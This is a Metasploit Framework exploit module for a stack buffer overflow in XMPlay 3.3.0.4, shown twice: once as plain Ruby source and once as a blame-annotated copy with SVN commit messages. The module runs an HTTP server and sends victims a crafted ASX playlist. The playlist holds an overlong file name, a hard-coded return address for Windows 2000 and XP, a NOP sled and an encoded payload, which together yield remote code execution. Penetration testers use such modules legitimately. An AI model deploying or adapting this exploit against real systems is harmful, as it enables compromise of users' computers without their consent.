metasploit-framework/modules/exploits/windows/browser/xmplay_asx.rb

require 'msf/core'

module Msf

class Exploits::Windows::Browser::Xmplay_Asx < Msf::Exploit::Remote

	include Exploit::Remote::HttpServer::HTML

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'XMPlay 3.3.0.4 (ASX Filename) Buffer Overflow',
			'Description'    => %q{
				This module exploits a stack overflow in XMPlay 3.3.0.4. 
				The vulnerability is caused due to a boundary error within 
				the parsing of playlists containing an overly long file name.
				This module uses the ASX file format. 
			},
			'License'        => MSF_LICENSE,
			'Author'         => 'MC', 
			'Version'        => '$Revision: 3653 $',
			'References'     => 
				[
					[ 'URL', 'http://secunia.com/advisories/22999/' ],
				],

			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'    => 750,
					'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40",
					'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
				},
			'Platform' => 'win',
			'Targets'  =>
				[
					[ 'Windows 2000 Pro English SP4',		{ 'Ret' => 0x77e14c29 } ],
					[ 'Windows XP Pro SP2 English',			{ 'Ret' => 0x77dc15c0 } ],
				],
			'Privileged'     => false,
			'DisclosureDate' => 'Nov 21 2006',
			'DefaultTarget'  => 0))
	end

	def autofilter
		false
	end
	
	def on_request_uri(cli, request)
		# Re-generate the payload
		return if ((p = regenerate_payload(cli)) == nil)
	
		drv	=  Rex::Text.rand_text_alpha_upper(1)
		ext	=  Rex::Text.rand_text_alpha_upper(3)

		sploit =  Rex::Text.rand_text_alpha_upper(498) + [ target.ret ].pack('V')  
		sploit << make_nops(40) + payload.encoded

		# Build the stream format 
		content =  "<ASX VERSION=\"3\">\r\n" + "<ENTRY>\r\n" 
		content << "<REF HREF=\"file://#{drv}:\\" + sploit
		content << "." + "#{ext}\"\r\n" + "</ENTRY>\r\n" + "</ASX>\r\n"

		print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")

		# Transmit the response to the client
		send_response_html(cli, content)
	end

end
end
added exploit module xmplay_asx.rb git-svn-id: file:///home/svn/framework3/trunk@4151 4d416f70-5f16-0410-b530-b9f4589650da 2006-11-24 01:12:05 +00:00			`require 'msf/core'`

			`module Msf`

			`class Exploits::Windows::Browser::Xmplay_Asx < Msf::Exploit::Remote`

Changed Html to HTML git-svn-id: file:///home/svn/framework3/trunk@4169 4d416f70-5f16-0410-b530-b9f4589650da 2006-12-10 02:55:02 +00:00			`include Exploit::Remote::HttpServer::HTML`
added exploit module xmplay_asx.rb git-svn-id: file:///home/svn/framework3/trunk@4151 4d416f70-5f16-0410-b530-b9f4589650da 2006-11-24 01:12:05 +00:00
			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'XMPlay 3.3.0.4 (ASX Filename) Buffer Overflow',`
			`'Description' => %q{`
			`This module exploits a stack overflow in XMPlay 3.3.0.4.`
			`The vulnerability is caused due to a boundary error within`
			`the parsing of playlists containing an overly long file name.`
			`This module uses the ASX file format.`
			`},`
			`'License' => MSF_LICENSE,`
			`'Author' => 'MC',`
			`'Version' => '$Revision: 3653 $',`
			`'References' =>`
			`[`
			`[ 'URL', 'http://secunia.com/advisories/22999/' ],`
			`],`

			`'DefaultOptions' =>`
			`{`
			`'EXITFUNC' => 'process',`
			`},`
			`'Payload' =>`
			`{`
			`'Space' => 750,`
			`'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40",`
			`'EncoderType' => Msf::Encoder::Type::AlphanumUpper,`
			`},`
			`'Platform' => 'win',`
			`'Targets' =>`
			`[`
			`[ 'Windows 2000 Pro English SP4', { 'Ret' => 0x77e14c29 } ],`
removed XPSP1 target in xmplay_asx.rb and replaced it with an XPSP2 target. git-svn-id: file:///home/svn/framework3/trunk@4152 4d416f70-5f16-0410-b530-b9f4589650da 2006-11-26 20:00:08 +00:00			`[ 'Windows XP Pro SP2 English', { 'Ret' => 0x77dc15c0 } ],`
added exploit module xmplay_asx.rb git-svn-id: file:///home/svn/framework3/trunk@4151 4d416f70-5f16-0410-b530-b9f4589650da 2006-11-24 01:12:05 +00:00			`],`
			`'Privileged' => false,`
			`'DisclosureDate' => 'Nov 21 2006',`
			`'DefaultTarget' => 0))`
			`end`

			`def autofilter`
			`false`
			`end`

			`def on_request_uri(cli, request)`
			`# Re-generate the payload`
			`return if ((p = regenerate_payload(cli)) == nil)`

			`drv = Rex::Text.rand_text_alpha_upper(1)`
			`ext = Rex::Text.rand_text_alpha_upper(3)`

			`sploit = Rex::Text.rand_text_alpha_upper(498) + [ target.ret ].pack('V')`
			`sploit << make_nops(40) + payload.encoded`

			`# Build the stream format`
			`content = "<ASX VERSION=\"3\">\r\n" + "<ENTRY>\r\n"`
			`content << "<REF HREF=\"file://#{drv}:\\" + sploit`
			`content << "." + "#{ext}\"\r\n" + "</ENTRY>\r\n" + "</ASX>\r\n"`

			`print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")`

			`# Transmit the response to the client`
API change for the HTML mixin, the send_response method is no longer overloaded, instead exploits must call send_response_html to enable HTML evasion. The old method caused problems when a exploit needed HTML and non-HTML response capabilities git-svn-id: file:///home/svn/framework3/trunk@4173 4d416f70-5f16-0410-b530-b9f4589650da 2006-12-10 03:26:53 +00:00			`send_response_html(cli, content)`
added exploit module xmplay_asx.rb git-svn-id: file:///home/svn/framework3/trunk@4151 4d416f70-5f16-0410-b530-b9f4589650da 2006-11-24 01:12:05 +00:00			`end`

			`end`
			`end`